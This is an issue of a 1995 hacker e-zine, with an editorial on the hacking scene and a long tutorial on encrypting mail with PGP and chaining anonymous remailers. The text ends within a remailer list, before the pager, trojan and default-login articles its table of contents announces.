Taking Your Machine Presents

-+-+-====================================================================-+-+-

Time For A Change
Volume 1 - Issue 2
March 22, 1995

-+-+-====================================================================-+-+-

INTRODUCTION
____________

Well, here is issue 2. A bit fatter, and hopefully a bit better than issue 1 was. We have a bit of a variety this month. I wrote a file which will hopefully educate more people on the why's and how's of encryption where it relates to mail. Major shares information on pagers, and hacking pager service. Panther Modern takes a deeper look into nslookup, with an excellent followup article to the How To Find Domains article from issue 1. Terminal presents a new trojan and ideas on how to install/use it.

A System ID file with defaults listed is also included, compiled by various members of TYM. This list will be constantly updated and released on its own, so please feel free to send items to be added: systems, defaults, etc.

Submissions for this magazine are accepted from anyone who has the desire to write an interesting article, and also has the ability to do so. We are actively seeking out quality writers, so don't be shy. Send your submissions, comments, suggestions, etc... to: gitm@alpha.c2.org or on mine or Voyagers boards.

Ghost in the Machine @
The FreeMatrix ]I[ (303) 914-0031
Hackers Haven BBS (303) 343-4053

All Contents in this magazine are Copyright (C) 1995 FreeMatrix Enterprises.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

TABLE OF CONTENTS:

INTRODUCTION...............................................Ghost in the Machine
Editorial: The State of the "Scene" as I see it............Ghost in the Machine
1. Encryption. Why you should use it, and How. Pt. 1: Mail.Ghost in the Machine
2. pagers...PAGERS...pAgErS...PaGeRs...PagerS..............Major
3. passwd trojan...........................................Terminal
4. nslookup: The Utility From The Gods.....................Panther Modern
5. A Definitive Guide to System ID and Defaults............TYM Crew

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Editorial: The State of the "Scene" as I see it.

Correct me if I am wrong, but those of you who have been around for a while may have noticed (and correctly at that) that the h/p scene in general is degenerating. It has been a few years since I have seen a collective of people sharing and helping each other out as a whole. I now see a bunch of tired old has-been's taunting the never-will-be's, people who "might-have-been" being totally turned off by the way they were treated upon entering the "scene".

The time is NOW to stop this moronic bullshit from all sides and get with the program. The "Computer Underground" community could be a powerful force to whatever ends, if it weren't continuously ripping itself into pieces.
All it takes is a little paying attention, a little more tolerance, and a little more common decency. Here are my suggestions to this end:

To those of you who have the knowledge, but are lacking in the social skills dept: Be nice to a lamer. You may not know what good could come of it. I do. I have always been quite helpful to people new to the scene, and it has rewarded me in learning new things from them. And most of the helping I've done isn't anything that required a great devotion of time. Usually a pointer to a book, or tfile is enough, and the people that are worth the while will take it from there.

To those of you who are new: Lurk! That is the single biggest problem that people new to the scene do. They start running off at the mouth, and anyone who may have been of help to them turns on the auto-idiot-filters and tunes them out. Listen to what people say, watch what they are doing, read, read, read. Most of all, ask questions only when you have exhausted your own sources of information. In other words learn what you can on your own, don't beg other people for easily obtained information. Hunt it down yourself and you might get an even better deal than you had hoped for. Pester people and you will probably be flamed into non-existence.

Most of all, I think some people need a brief refresher on what hacking is all about. It is not about getting root, destroying information, crashing BBS's, getting the latest unix exploit, posing on IRC, or espionage. Though I suppose it could be used for these ends. It is about: LEARNING, EXPLORING, and LIBERATING.

As the title of this magazine suggests, it *IS* Time For a Change. It is time to get back to the basics and remember what this is all about. It is time to join together as brothers instead of breaking up into small non-communicating parts. It is time to go and search for new things, time to quit becoming fully like the totalitarian institutions that we supposedly despise.
It is time to throw a big fuck you at our deaf and blind government. It is time to move forward instead of stagnating. It is time to evolve. It is TIME FOR A CHANGE.

Peace.
gitm@alpha.c2.org

-------------------------------------------------------------------------------

Time for a Change presents

Encryption, Why you should use it, and How.
Part I - Mail
by Ghost in the Machine

------------------------------------------------------------------------------

INTRODUCTION -

This file is aimed at the crypto-novices from all walks of life. Whether it be the wily sysadmin wanting to protect crucial system information, the ueberhacker wanting to keep his activities secret, or joe blow from anyplace USA that wants to make sure his private life remains private. The main reason that I am writing this file is that many people I communicate with refuse to use encryption, or do use it, but very grudgingly. I want all of my communications to be secure, and so should you. This file will make an attempt to explain why YOU need encryption, and some means of obtaining and using it.

Why should I use encryption?

Let me just say that the world is an insecure place, and the net is even more so. Everything you do or say can be logged, recorded, and/or in some way monitored. I am not going to try to tell you how to gain personal privacy in the real world (perhaps the next file.), but how to gain at least an acceptable level of privacy electronically.

Let's start with an example that most people can relate to: Email. You have an account on netcom.com, you want to send mail to someone at nyx.cs.du.edu. Sounds pretty simple eh? Well, the following is a log from traceroute on just exactly where your packets are going.

 1  netcomgw.netcom.net (192.100.81.254)  2 ms  12 ms  3 ms
 2  t3-1.scl-gw1.netcom.net (163.179.101.2)  3 ms  2 ms  2 ms
 3  t3-1.chi-gw1-2.netcom.net (163.179.102.1)  49 ms  47 ms  47 ms
 4  t3-1.dc-gw4-2.netcom.net (163.179.103.1)  60 ms  64 ms  60 ms
 5  t3-1.mae-east.netcom.net (163.179.157.2)  61 ms  60 ms  60 ms
 6  sl-mae-e-F0/0.icp.net (192.41.177.241)  84 ms  63 ms  60 ms
 7  sl-dc-8-H1/0-T3.sprintlink.net (144.228.10.41)  61 ms  61 ms  61 ms
 8  sl-fw-5-H4/0-T3.sprintlink.net (144.228.10.18)  99 ms  96 ms  93 ms
 9  sl-fw-4-F0/0.sprintlink.net (144.228.30.4)  95 ms  95 ms  95 ms
10  sl-uccs-1-S0-T1.sprintlink.net (144.228.34.82)  124 ms  120 ms  122 ms
11  ACI-UCCS.co.westnet.net (198.59.67.29)  126 ms  122 ms  143 ms
12  CCC-ACI.co.westnet.net (198.59.9.81)  157 ms  206 ms  160 ms
13  UCBCGS-CCC.co.westnet.net (198.59.9.5)  188 ms  137 ms  171 ms
14  * DEN-UCBCGS.co.westnet.net (204.131.55.65)  146 ms  163 ms
15  DU-DEN.co.westnet.net (204.131.55.14)  146 ms  176 ms  162 ms
16  du-up0.cair.du.edu (130.253.253.253)  991 ms *  137 ms
17  du-up1.fddi.du.edu (130.253.251.253)  487 ms  145 ms  178 ms
18  nyx.cs.du.edu (130.253.192.68)  150 ms  176 ms *

That is 18 stops on the way to its destination, any of which could intercept your mail. Never mind the destination, where it will sit for an indefinite period of time.

Let me make one thing very clear. System Administrators and Hackers, and perhaps other people CAN and DO read private mail on the systems where they have the ability to do so. There are lots of reasons for this. Sysadmins sometimes do it to search for signs of system intrusion, for other "legitimate" reasons, or simply because they are bored, nosey and can. Hackers also do it for many reasons, to look for possible holes/passwords/etc to exploit, to get information about a certain person, to make sure the sysadmin is not on to them, and also because they are bored, nosey, and can.

The next obvious step for some people (apparently a LOT of people) is to take a small step in securing anonymity.
Using an anonymous remailer.

A very popular remailer is located at anon.penet.fi. The way it works is you send mail to it, it sends you back an id in the format of anXXXXXX where XXXXXX is a 6 digit number based somehow on your host/user-name. Each person gets a unique ID and is able to send mail "anonymously" by addressing the message to anon@anon.penet.fi and putting X-Anon-To: guy@foo.bar in either the header or body of the message. It also has password capabilities which are required to use the anon account to post to usenet newsgroups.

This seems to be secure enough for some people, but in reality, it's no more secure than sending mail directly. The only difference is, on the last leg of the trip it no longer contains your email address. One problem stems from the fact that penet ALWAYS has your address, and in order to compromise ANY "anon" communications through there, you only need to capture one system.

Also, there is the matter of before and after. If you send sensitive material (I'll leave it to you to define sensitive) via email, you have your account, and someone else's attached to it. Anon remailing takes only one of those factors out. Depending on which side of penet your mail happens to be on, that may not even be the case. On its way to penet, and until it is processed (chewed up and spat out a lot of the time) the mail contains your address, the recipient's address, AND your anon password in plaintext. Some user end mail programs save sent mail automatically, thereby totally defeating the purpose of sending anon mail. Even if your mail program doesn't save your mail, and you are extra careful about it, take a look at where it goes before it hits penet.

 1  * netcomgw.netcom.net (192.100.81.254)  56 ms  66 ms
 2  t3-1.scl-gw1.netcom.net (163.179.101.2)  7 ms  2 ms  2 ms
 3  149.20.64.1 (149.20.64.1)  4 ms  3 ms  3 ms
 4  San-Jose3.CA.ALTER.NET (137.39.29.1)  23 ms  7 ms  7 ms
 5  Vienna1.VA.ALTER.NET (137.39.12.1)  242 ms  187 ms  245 ms
 6  * Vienna3.VA.ALTER.NET (137.39.11.4)  70 ms  70 ms
 7  Amsterdam2.NL.EU.net (134.222.5.1)  174 ms  199 ms  176 ms
 8  Espoo-Tapiola1.fi.eu.net (134.222.27.2)  216 ms  213 ms  212 ms
 9  Helsinki-Keskusta1.FI.EU.net (193.66.32.30)  218 ms  224 ms *
10  Helsinki-Keskusta3.FI.EU.net (193.64.138.252)  220 ms  217 ms  221 ms
11  router.penet.fi (193.64.202.254)  272 ms !H  229 ms !H  276 ms !H

11 systems besides your own and anon.penet itself are having your mail passed through. That's not to mention any local machines your system might route its mail through. All of those systems are seeing the "before" aspect of your "anonymous" mail. Any one of them could intercept it.

You may ask: Why would anyone want to intercept my mail? That's not really the point, if someone is intercepting mail on a gateway, and happens to get yours, they might read it. Even a minuscule chance of mail interception is far too great a chance in my mind. If that is not enough, there have been dozens of rumors of penet being compromised, which makes it just a long out-of-the way semi-conspicuous trip to the same place.

(Note: Since the original draft of this document, Julf's remailer at penet was raided by Finnish police (as well as his home) and he was forced to give up some information regarding a person who used the remailer for "illegal" purposes. Penet is through, use it only as a fond memory of an early remailer. You are completely relieving yourself of privacy if you use this remailer.)

Consider, however, an encrypted mail message. It cannot be read locally, because it is encrypted, it cannot be read by any possible interceptors for the same reason.
If you use encryption AND a double blind anon service like penet, you are moving in the right direction. An even better move would be to use encryption, cypherpunk remailers (which will be covered later in this text) and throw penet or a similar service somewhere in the middle of the whole mess. Then you have as close to secure communication as you can get on a gigantic global network. There are still ways that these messages can be intercepted, followed, traced, and so forth, but these methods are quite difficult to accomplish, and are well beyond the scope of this document.

METHODS -

-PGP-

The first thing you will want to do is pick up a copy of PGP 2.6 or higher. Due to legal reasons, PGP is no longer compatible with versions lower than 2.5. You can still read messages from people using 2.3- but they cannot read yours. If you are currently using a version less than or equal to 2.3a, upgrade. You aren't doing anything but inconveniencing yourself. If you are having trouble finding pgp,

ftp to:    ftp.csua.berkeley.edu
directory: /pub/cypherpunks

This site is the cypherpunks main ftp site. In addition to pgp, you will find a great assortment of other interesting crypto related documents, papers, programs, source code, etc.. It's a great site, check it out.

Once you get (and install, compile or whatever you need to do with it on your machine) pgp, read the documentation thoroughly. Generate your own private key, and make an ascii public key extraction. Play with it until you get a decent feel for how the public key cryptosystem works.

-REMAILERS- (Including chaining faq - With my mods to make it readable)

----------------------------BEGIN INSERTED FILE--------------------------------

CHAINING REMAILERS HELP

Note-1: [RRT- stands for Request-Remailing-To:, most remailers also accept Anon-To: ]

Note-2: [You is in this doc me@mysite.home, substitute that address for your own if you want to receive the test message yourself]

Note-3: Anon-To: me@mysite.home MUST be written exactly as shown!
        1    2  3
                3 is a Space
             2 is a Capital Letter
        1 is a Capital Letter

Note-4: All lines beginning with > are not intended to be typed/sent that way, they are just to mark what the messages should contain.
__________________________________________________________________________

First you should test only one remailer:

you > remailer 1 >> RRT- you
__________________________________________________________________________

This is what you send: -->

> From: me@mysite.home
> To: hal@alumni.caltech.edu
>
> ::
> Request-Remailing-To: me@mysite.home
>
> Test of remailer at alumni.caltech.edu
__________________________________________________________________________

This is what you receive from alumni.caltech.edu: -->

> From: nobody@alumni.caltech.edu
> To: me@mysite.home
>
> Test of remailer at alumni.caltech.edu
__________________________________________________________________________

If this is successful you add another remailer:

you > remailer 1 >> RRT- remailer 2 >>> RRT- you

This is what you send: -->

> From: me@mysite.home
> To: hal@alumni.caltech.edu
>
> ::
> Request-Remailing-To: usura@xs4all.nl
>
> ::
> Request-Remailing-To: me@mysite.home
>
> Test of remailer at alumni.caltech.edu and RRT xs4all.nl
__________________________________________________________________________

Remailer usura@xs4all.nl will receive this message from hal@alumni.caltech.edu -->

> From: nobody@alumni.caltech.edu
> To: usura@xs4all.nl
>
> ::
> Request-Remailing-To: me@mysite.home
>
> Test of remailer at alumni.caltech.edu and RRT xs4all.nl
__________________________________________________________________________

Because the message has the header pasting tokens [::] the remailer at xs4all.nl knows where to send it to. You will receive this message from xs4all.nl -->

> From: nobody@vox.xs4all.nl
> To: me@mysite.org
>
> Test of remailer at alumni.caltech.edu and RRT xs4all.nl
__________________________________________________________________________

You can keep adding remailers this way, every time you receive a test message back you add another remailer: if you stop receiving test messages, the last remailer added is most likely "down". You can check that by using that remailer directly.

(ED Note: Some remailers that I have used take a VERY long time to remail. I have had even direct test messages take up to 12-24 hours. In other words, do not expect an immediate response from most remailers. A list of remailers and their presently clocked uptime will be included later in this file.)
__________________________________________________________________________

The above is simple unencrypted remailing. If you want to have an encrypted chained remailing, you first have to "design" the chain.

0] from your PC send to alumni.caltech.edu
1] at alumni.caltech.edu RRT jpunix.com
2] at jpunix.com RRT vox.hacktic.nl
3] at vox.hacktic.nl RRT me@mysite.home

{Stage 3:} This is actually the first message you make. -->

> ::
> Request-Remailing-To: me@mysite.home
>
> Test of PGP'ed remailing trough caltech, jpunix and vox.
__________________________________________________________________________

The above is encrypted with the PGPpubKEY of vox.hacktic.nl and will result in this:

> -----BEGIN PGP MESSAGE-----
> Version: 2.6 for VoX Labz.
>
> hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe
> 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+
> 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA
> AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs
> hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w==
> =b0bT
> -----END PGP MESSAGE-----
__________________________________________________________________________

You then proceed to the 2nd stage. The message which has to leave jpunix.com, so that remail@vox.hacktic.nl knows what to do [decrypt it], is: -->

> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.6 for VoX Labz.
>
> hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe
> 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+
> 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA
> AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs
> hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w==
> =b0bT
> -----END PGP MESSAGE-----
__________________________________________________________________________

{Stage 2:} But jpunix.com has to know where to send it to, so the 2nd stage msg is: -->

> ::
> Request-Remailing-To: remail@vox.hacktic.nl
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.6 for VoX Labz.
>
> hIwCWd90FI1WkT0BA/9I6ILVhl5ZpsgKgHye+ng9CokwzdW1pMgcd0ecigppAODe
> 53LlyVw/hl1ERYIzWW9W4vnuh7sLgu9XjxB515FtT5VSyZLZrhKIF7XtACga2On+
> 1NmsecLTrgXYcc4k0Y+l66Hs06z92yhFvjXruDBS2Pame0VDtgZo+4aPntioDaYA
> AABJsVIWRaJkCib+uek9Pr6GqFP7lwaMqq8XFnFxY42h3Wn3c5DikrzmwKGK5xVs
> hmiZnEhJgXvR7jS2cNNOk/geG4SnUqvMTzpq6w==
> =b0bT
> -----END PGP MESSAGE-----
__________________________________________________________________________

The above is then encrypted with the PGPpubKEY of jpunix.com
__________________________________________________________________________

{Stage 1:} This new encrypted message gets the headers for caltech to remail: -->

> ::
> Request-Remailing-To: remail@jpunix.com
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
>
> and the PGP encrypted message from {stage 2}
>
> -----END PGP MESSAGE-----
__________________________________________________________________________

{Stage 0:} the message you send to alumni.caltech.edu is the encrypted message [with the PGPpubKEY of alumni.caltech.edu] of stage 1 plus a Encrypted: PGP header. -->

> To: hal@alumni.caltech.edu
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
>
> and the PGP encrypted message from {stage 1}
>
> -----END PGP MESSAGE-----
__________________________________________________________________________

This you send from your PC to hal@alumni.caltech.edu : ->

> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE----- [with alumni.caltech.edu's PUBkey]
> Version: 2.6.1
> ::
> Request-Remailing-To: remail@jpunix.com
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE----- [with jpunix.com's PUBkey]
> Version: 2.6.1
> ::
> Request-Remailing-To: remail@vox.hacktic.nl
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE----- [with vox.hacktic.nl's PUBkey]
> Version: 2.6.1
> ::
> Request-Remailing-To: me@mysite.home
>
> Hi mom I'm home.
> ---------------------------------
> -----END PGP MESSAGE-----   <- the inner envelope: you close this first
> -----END PGP MESSAGE-----   <- the second envelope: you close this second
> -----END PGP MESSAGE-----   <- the outer envelope: this one you close last

--

If you finger remailer.help.all@chaos.bsu.edu you will receive a list of active remailers and their peculiarities.

If you finger remailer-list@chaos.bsu.edu and/or remailer-list@kiwi.cs.berkeley.edu you will receive a list of uptime statistics.

________________________END INSERTED FILE______________________________________

This might seem kind of confusing to some at first glance, especially once you start testing with encryption. But the easiest way to remember is that it is a reverse enveloping system. The last remailer on your chain is the one with the real destination enclosed, and therefore is the first one to encrypt. From there it is elementary.

-- TYPES

There are several kinds of remailers. Some give you a mailing address pseudonym and no other protection. Others give you a mailing address and will encrypt all incoming mail for you based on a password that you supply. Still more (the majority) provide their public key and offer to decrypt and forward mail encrypted to it. I will attempt to cover a few of these types, and how you can go about using them.

-- ALIASING REMAILERS

The first type I will cover is the anon service at anon.penet.fi. It seems to be the most popular, and is also in the process of having some legal difficulties at the moment. Please read alt.privacy.anon-server if you would like to contribute help to their cause.

anon@anon.penet.fi - Easiest for non-crypto types. All you need to do is send mail to ping@anon.penet.fi to receive a double blind address (note: double blind means that anyone who responds to you will be given an anonymous address and your mail will appear to come from it.
Keep this in mind if you had thoughts of subscribing to high volume mailing lists through this service.). It will be mailed back to you automatically. It supports a password, nickname, and can be moved from mailing address to mailing address. It is a very good (if not comparably secure) remailer system. For a detailed help file on everything you could possibly want to know about it, send mail to help@anon.penet.fi.

alpha.c2.org - Another aliasing service, but much more secure. When you use a service like penet, they actually have your mailing address. My mailing address at alpha.c2.org has no idea where to find me. It instead has what is called a reply block for my return address. A reply block is just like all the previous chaining information I went over, except all that the last part contains is where to send the actual message to. You can also include reply blocks in anonymous mail to people who you would like to get a response from. Just put the block and a few other small instructions (scripts.tar.gz on the cypherpunk ftp site contains scripts that can automate the more painful aspects of both this and several other chaining functions.).

Here is an example reply block to a person (note: do NOT try to use this for remailers.. they will barf on all the excess ascii garbage).

--------8<--cut here-->8--------
::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

[ASCII-armored reply block data]
-----END PGP MESSAGE-----

Another nice feature of this particular remailer is that all mail sent to your actual address from there is also encrypted by alpha using standard pgp encryption using your chosen password as the key. I don't consider this to necessarily be a benefit where network monitoring is in effect, because I don't know where or how they store the account passwords, but since the mail you are receiving should be encrypted by the sender (hint, hint) it is an added bonus. Also it keeps nosy local sysadmins from scanning your mail for keywords or whatever. From this address (like many others) you can send/receive mail and post to usenet newsgroups.

First, here is alpha's public key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi7K8rQAAAEEAMiK09Nd+NfaL4Q14bKT0Ivdj3MdbCjAG6Cs5ULYBS1ZWSLA
KiHsm0+kPNHqBVOufN7FT2iK0Mbuyk+dZgHG6ScicDkImysRkmso7eh5c9mU9V8K
M0+ImKJyOwgVLEgyRK5e4h2XHpwSTtpx3zZpk4CsexLGCQNXF+ikm236U0rNAAUR
tCpQc2V1ZG9ueW1vdXMgUmVtYWlsZXIgPGFsaWFzQGFscGhhLmMyLm9yZz4=
=xmQf
-----END PGP PUBLIC KEY BLOCK-----

Now, to create your new mail alias, pick a nick, and create the following message:

From: yourname@alpha.c2.org
New-Password: Your_Password
Reply-Block:

Now, encrypt to alpha with the -eta options on pgp, and send it off to alias@alpha.c2.org. It would probably be a good idea to chain it through one or more remailers on its way. You should receive a response within an hour or so acknowledging your alias. For a comprehensive help file on this remailer, send mail to help@alpha.c2.org.

chop.ucsd.edu - Nearly identical in most respects to anon.penet.fi. Send mail to acs-help@chop.ucsd.edu for an anonymous address assignment and a helpfile.

mg5n+remailer@andrew.cmu.edu - This aliasing service is very similar to the service provided by alpha.c2.org.
The main difference I note is that the address is a bit more bulky. It is in the format of mg5n+alias!@andrew.cmu.edu. Kinda long for my tastes, but they still provide an excellent service. Send mail to mg5n+remailer-help@andrew.cmu.edu for a helpfile.

-CYPHERPUNK REMAILERS-

The next part of this file can be better summed up by 2 existing files. They cover all of the current remailers and their functions. The first one is a great helpfile containing the quirks and features of various remailers and their public keys. The second is a more structured listing with uptime statistics and other useful information.

---------------------------BEGIN INSERTED FILE #2-------------------------------

MATT GHIO'S REMAILER LIST

Finger remailer.help.all@chaos.taylored.edu or remailer.help.all@204.95.228.28 for the latest version of this file.

Please report any inaccuracies in this information to Matthew Ghio

Last Updated: January 24, 1995

The Cypherpunks' remailers allow you to send anonymous mail by adding the header Request-Remailing-To: and sending to one of the addresses listed below. Most (but not all) of these remailers also accept Anon-To: in place of Request-Remailing-To. These headers must be typed exactly as you see them; most remailers are case-sensitive. Mail without these headers is either rejected or delivered to the remailer administrators.

If you can not add the required headers, place two colons (::) on the very first line of your message, then on the next line type Request-Remailing-To: and the address you want to send anonymously to. Skip a line, and then begin your message. Note that by using this method it is possible to send a message consecutively thru more than one remailer. Be sure to place the double colons on the first line of the message, and skip one line following the headers. Extra blank spaces (or forgetting to separate the headers and message) may cause problems. Also, keep in mind that many remailers only allow one recipient per message.

The standard cypherpunks anonymous remailers are:

hfinney@shell.portal.com
hal@alumni.caltech.edu
nowhere@bsu-cs.bsu.edu
usura@xs4all.nl
remail@c2.org
remailer@ideath.goldenbear.com
remailer@rebma.mn.org
remail@vox.xs4all.nl
remailer@desert.xs4all.nl
remailer@nately.ucsd.edu
remailer@xs4all.nl
homer@rahul.net
q@c2.org
remailer@alpha.c2.org
usura@replay.com
remailer@myriad.pc.cc.cmu.edu
syrinx@c2.org
vanklava@eniac.ac.siue.edu
remailer@tower.techwood.org

You can add additional headers to your message by placing two number signs (##) at the beginning of the first line of the message body, and then add the special headers on subsequent lines. These headers are not interpreted by the remailer software, only passed thru to the output message. Some remailers require that you place the Subject: header in the body of the message, after the ## - The original subject line is removed. See the listings available by fingering remailer-list@kiwi.cs.berkeley.edu for specific format information for each remailer.

remailer@soda.csua.berkeley.edu works slightly differently. It includes an encrypted reply block so that people can reply to your messages. It also requires that you use the header Anon-Send-To: to send anonymously, and features a usenet posting service. For more information on this remailer, finger remailer@soda.csua.berkeley.edu, or send mail to that address with the Subject: remailer-info

remail@extropia.wimsey.com requires that you public-key encrypt your messages with PGP. This added security prevents a hacker or nosey sysadmin at your site from reading your outgoing mail or finding out where it's going. This remailer is not directly connected to the internet, so messages will be delayed about an hour.

Some of the other remailers support PGP as well.
For remailers which support both encryption and plaintext messages, identify encrypted messages by adding a header which reads: Encrypted: PGP, either in the actual message headers, or following a double colon (see examples below). PGP keys can be found at the end of this document.

Some remailers offer several additional features. These include remailer@alpha.c2.org, remailer@xs4all.nl, remailer@nately.ucsd.edu, usura@replay.com and remailer@myriad.pc.cc.cmu.edu

Adding the header "Cutmarks:" will truncate the message starting with any line that begins with the same characters as in the Cutmarks header. This can be used to remove an automatically-inserted signature file.

Also supported is the header "Latent-Time:". This allows a message to be delayed at the remailer and sent out at a later time. This is useful because it prevents people from correlating the times at which certain anonymous posts appear with the times that you are logged in. Both absolute and relative delays are possible. For example, "Latent-Time: 19:00" would have the remailer hold the message until 7 PM local time and then deliver it. Times must be in 24-hour format. "Latent-Time: +06:30" would deliver the message six hours and thirty minutes after it is received. The maximum permissible delay is 24 hours.

These lines may be placed either in the message headers, or following the double colon. For more information, send mail to one of the remailers listed above, Subject: remailer-help

There is an anonymous contact service at anon.penet.fi. Users are automatically assigned an address of the form anxxxxxx@anon.penet.fi, where xxxxxx is a number, when they first send a message via this remailer. Any replies to this address are forwarded back to you. For information on this remailer, send mail to: help@anon.penet.fi

There is another anonymous contact service at chop.ucsd.edu. For information on this remailer, send mail to: acs-info@chop.ucsd.edu

desert.xs4all.nl also has an anonymous account service.
For more information, send mail to remail@desert.xs4all.nl with subject "help".

There is a system installed on alpha.c2.org which will allow you to create an email address and have messages sent to that address encrypted and sent to you. For info on this remailer, send mail to help@alpha.c2.org. A help file on another remailer of this type is available by sending mail to mg5n+remailer-help@andrew.cmu.edu

If you have a www browser, a help file on a similar service is available from http://www.c2.org/services/blind

Anonymous postings to usenet can be made by sending anonymous mail to one of the following mail-to-usenet gateways (but the news gateways themselves do not make the message anonymous):

  group.name@news.demon.co.
  group.name@bull.com
  group.name@cass.ma02.bull.com
  group.name@charm.magnus.acs.ohio-state.edu
  group.name@comlab.ox.ac.uk
  group.name@paris.ics.uci.edu
  group.name@myriad.pc.cc.cmu.edu (Supports Crossposting)
  group.name.usenet@canaima.Berkeley.EDU
  group.name.usenet@decwrl.dec.com (Preserves all headers)

The mail-to-news gateways do not anonymize messages; you must use a remailer if you want the message to be posted anonymously. Not all gateways support all newsgroups. You may have to try several to find one that supports the groups you wish to post to. It would also be advisable to try a post to alt.test before relying on any such system to function as expected. Also note that the last two require .usenet at the end of the address.

In addition, you can cross-post to several newsgroups by adding the header Newsgroups: with the names of the groups you want to post to and sending it to mail2news@news.demon.co.uk or mail2news@myriad.pc.cc.cmu.edu (Use the ## feature with the remailers to add the header line)

Examples:

Simple Remailing:

> From: joe@site.com
> To: remail@c2.org
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
>
> This is some anonymous mail.
Chaining remailers:

> From: sender@origin.com
> To: remailer@rebma.mn.org
>
> ::
> Request-Remailing-To: remailer@myriad.pc.cc.cmu.edu
>
> ::
> Request-Remailing-To: recipient@destination.com
>
> This is an anonymous message

Adding extra headers to the output message:

> From: suzie@euronet.co.uk
> To: remailer@nately.ucsd.edu
>
> ::
> Request-Remailing-To: mail2news@news.demon.co.uk
>
> ##
> Subject: Ignore this test
> Newsgroups: alt.test
> Comments: This is only a test
>
> This message will be posted to alt.test!

Cutmarks and delay:

> From: sam@eric.com
> To: remailer@xs4all.nl
> Subject: ignore
>
> ::
> Anon-To: alt.test@comlab.ox.ac.uk
> Latent-Time: +15:30
> Cutmarks: --
>
> This is an anonymous test.
> Note that it does not have my .sig appended to it!
>
> --
> sam@eric.com - 310-853-1212 - This is my .sig - Finger for PGP key!

The following are PGP public keys of the remailers which support encryption. Remember to use the Encrypted: PGP header!
The operation of this system of remailers is a group effort which relies on the contributions of many generous people. Please do not abuse the remailers. If you have problems with a remailer, some of the remailer operators can be contacted by sending mail to the remailer's address without a remailing request header. Otherwise, follow the instructions that come in the headers of messages from the remailer. Do not send complaints to postmaster at the site, unless the remailer operator specifies that as the address to make complaints. Many of the remailers are run by people who are not the general site administrators, and sending to the wrong address (ie postmaster@...) will most likely just make them annoyed at you, and won't get your problem resolved.

If you can run an anonymous remailer, please volunteer to do so. Software is available from anonymous-FTP at ftp.csua.berkeley.edu in the directory /pub/cypherpunks/remailer/ Additional information and source code can be found at ftp cs.cmu.edu in the directory /afs/andrew.cmu.edu/usr12/mg5n/public/remailer or contact me and I'll send you what you need. The software can be run on most personal unix accounts.

There are two usenet forums for discussion of anonymous remailer systems, alt.privacy.anon-server and alt.anonymous
The newsgroup alt.anonymous.messages is a 'mail-drop' for anonymous parties to exchange encrypted messages.

The cypherpunks mailing list is a forum for discussing ways to promote privacy via cryptography.
To join, send mail to cypherpunks-request@toad.com

Additional information on the anonymous remailers is available from http://www.cs.berkeley.edu/~raph/remailer-list.html

-----------------------------END INSERTED FILE #2------------------------------

-----------------------------BEGIN INSERTED FILE #3----------------------------

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = " cpunk pgp. post";
$remailer{"avox"} = " cpunk pgp post";
$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"rebma"} = " cpunk pgp hash";
$remailer{"c2"} = " eric pgp hash";
$remailer{"soda"} = " eric post";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub";
$remailer{"usura"} = " cpunk pgp. hash latent cut post";
$remailer{"desert"} = " cpunk pgp. post";
$remailer{"nately"} = " cpunk pgp hash latent cut";
$remailer{"myriad"} = " cpunk pgp hash latent cut ek";
$remailer{"xs4all"} = " cpunk pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = " cpunk pgp hash";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub";
$remailer{"q"} = " cpunk mix pgp hash latent cut ek ksub";
$remailer{"syrinx"} = " cpunk pgp";
$remailer{"tower"} = " cpunk pgp";
$remailer{"eniac"} = " cpunk pgp hash latent cut ek";
$remailer{"charon"} = " cpunk hash latent cut ek";
$remailer{"bonafide"} = " cpunk hash latent cut ek";
$remailer{"ford"} = " cpunk hash latent cut ek";
$remailer{"aegis"} = " cpunk";
$remailer{"hroller"} = " cpunk hash";
$remailer{"vanka"} = " cpunk pgp hash latent cut ek";
